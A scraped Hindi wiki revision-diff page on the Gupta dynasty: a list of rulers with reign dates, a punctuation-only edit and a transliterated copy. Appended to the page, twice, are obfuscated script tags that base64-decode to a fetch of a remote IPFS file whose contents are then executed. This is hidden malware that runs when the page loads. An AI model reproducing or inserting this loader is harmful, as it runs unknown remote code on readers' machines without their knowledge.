Difference between revisions of "गुप्त राजवंश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "॰" to ".")
Line 1: Line 1:
 
गुप्त राजवंशों का इतिहास साहित्यिक तथा पुरातात्विक दोनों प्रमाणों से प्राप्त होता है। गुप्त राजवंश या गुप्त वंश प्राचीन [[भारत]] के प्रमुख राजवंशों में से एक था। इसे भारत का एक स्वर्ण युग माना जाता है। इस राजवंश में जिन शासकों ने शासन किया उनके नाम इस प्रकार है:-
 
गुप्त राजवंशों का इतिहास साहित्यिक तथा पुरातात्विक दोनों प्रमाणों से प्राप्त होता है। गुप्त राजवंश या गुप्त वंश प्राचीन [[भारत]] के प्रमुख राजवंशों में से एक था। इसे भारत का एक स्वर्ण युग माना जाता है। इस राजवंश में जिन शासकों ने शासन किया उनके नाम इस प्रकार है:-
*श्रीगुप्त (240-280 ई॰),
+
*श्रीगुप्त (240-280 ई.),
*[[घटोत्कच (गुप्त काल)|घटोत्कच]] (280-319 ई॰),
+
*[[घटोत्कच (गुप्त काल)|घटोत्कच]] (280-319 ई.),
*[[चंद्रगुप्त प्रथम]] (319-335 ई॰)
+
*[[चंद्रगुप्त प्रथम]] (319-335 ई.)
*[[समुद्रगुप्त]] (335-375 ई॰)
+
*[[समुद्रगुप्त]] (335-375 ई.)
*रामगु्प्त (375 ई॰)
+
*रामगु्प्त (375 ई.)
*[[चन्द्रगुप्त विक्रमादित्य|चंद्रगुप्त द्वितीय]] (375-414 ई॰)
+
*[[चन्द्रगुप्त विक्रमादित्य|चंद्रगुप्त द्वितीय]] (375-414 ई.)
*कुमारगुप्त महेन्द्रादित्य (415-454 ई॰)
+
*कुमारगुप्त महेन्द्रादित्य (415-454 ई.)
*स्कन्दगुप्त (455-467 ई॰)
+
*स्कन्दगुप्त (455-467 ई.)
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 08:41, 25 August 2010

gupt rajavanshoan ka itihas sahityik tatha puratatvik donoan pramanoan se prapt hota hai. gupt rajavansh ya gupt vansh prachin bharat ke pramukh rajavanshoan mean se ek tha. ise bharat ka ek svarn yug mana jata hai. is rajavansh mean jin shasakoan ne shasan kiya unake nam is prakar hai:-


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>